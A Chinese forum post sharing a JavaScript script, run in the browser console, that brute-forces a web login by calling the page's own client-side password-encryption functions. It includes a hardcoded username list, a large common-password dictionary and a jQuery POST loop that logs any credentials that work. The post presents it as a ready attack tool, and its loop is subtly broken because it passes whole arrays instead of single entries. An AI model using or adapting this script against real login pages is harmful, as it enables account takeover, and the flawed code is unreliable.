90_ 发表于 2021-12-27 16:17:44

使用js 脚本爆破自定义加密

优势:
1. js 加密,再通过js 解密省去了分析加密过程
2 . 异步速度很快
3. 无需部署其它环境,一个浏览器就够了

如网站没引用jquery,须引用外部jquery

以下为代码部分:
// http://192.168.1.9:8000/home/Account/LogOn
// 定义用户名部分
var uids = ["admin","2311","7245","2627","7243","6100","2970","6939","6549","6696","8006","6733","8224","8007","6132"]

// var uids=["admin"]
//定义密码列表
var pass = ["!QAZ6yhn","000000","000000000","0000000000","0000000000000000","0123456789","110120119","111111","111111111","1111111111","1111111111111111","123.mima","123123","123123123","1233211234567","1234.com","1234554321","123456","123456.","123456..","123456789","123456789.","123456789..","1234567890","12345678900","1234567891","12345678910","1234567891234567","1234567899","123456789a","123456789abc","123456789q","123456789qq","123456a","123456aa","123456abc","123456asd","123456q","123456qq","123698745","123abc","1314520520","135792468","1357924680","147258369","1472583690","1qaz!QAZ2wsx@WSX","1qaz#EDC5tgb","1qaz2wsx!QAZ@WSX","1qaz@WSX","1qaz@WSX3edc","1qaz@wsx","2wsx#EDC","3edc$RFV","5201314","5201314520","52013145201314","5841314520","5tgb^YHN","6yhn&UJM","741852963","7708801314520","789456123","7894561230","987654321","9876543210","AAA111...","Aa111111","Abc@1234","Abcd1234","Hello01!","Hema1111","MIMA.123","Qwe123!@#","Welcome123","Welcome1234","a123123","a123456","a12345678","a123456789","a5201314","aa123456","aa123456789","aaa123456","abc123","abc123456","abc123456789","abcd123","abcd1234","abcd123456","aini1314","as123456","asd123","asd123456","asdASD123!@#","asdfghjkl","caonima","fir2k7st","mima..123","mima.123","mima.1234","mima.321","mima.456","mima123.","nopass.1","nopass.2","password1!","q123456","q123456789","qaz123456","qazwsxedc","qazxsw.123","qq123456","qq123456789","qq5201314","qwe123","qwe123456","qwe567,.","qwerty","qwertyuiop","w123456","w123456789","wang123456","woaini","woaini123","woaini1314","woaini1314520","woaini520","woaini521","www123456","z123456","z123456789","zxc123","zxc123.0","zxc123456","zxcvbnm","zxcvbnm123"]

var count = uids.length * pass.length
console.info("INFO: 一共需要请求:"+count+"次\n")
//定义登录接口
var url = "http://192.168.1.9:8000/home/account/LogOn"

//请求主体,及表单部分
function p(url,uid,pass){
// js密码加密部分
enpass = do_encrypt_slim(getmd5str(pass))
        $.ajax({
                url : url,
                type : "POST",
    async : false,
                data : {       
                        usercode:uid,
                        password:enpass,
                        phonecheckword:null
                },
                success : function(data){
                        if(data.flag != false){
      console.log("%c[+] login successful!\n"+"Loginid:"+uid+"\tpassword:"+pass+"\tusername:\t"+data.username+"\n","color: green")
                        }else{
      console.warn("[-] Login failed !\t当前尝试用户:"+ uid +"\t信息:"+data.msg+"\n")
      }
                },
    timeout: 1000 //防止卡死
        });
}

for (uint =0; uint<=uids.length-1;uint++){
for (i = 0; i<=pass.length-1;i++){
    p(url,uids,pass);
   
}
}

效果图

页: [1]
查看完整版本: 使用js 脚本爆破自定义加密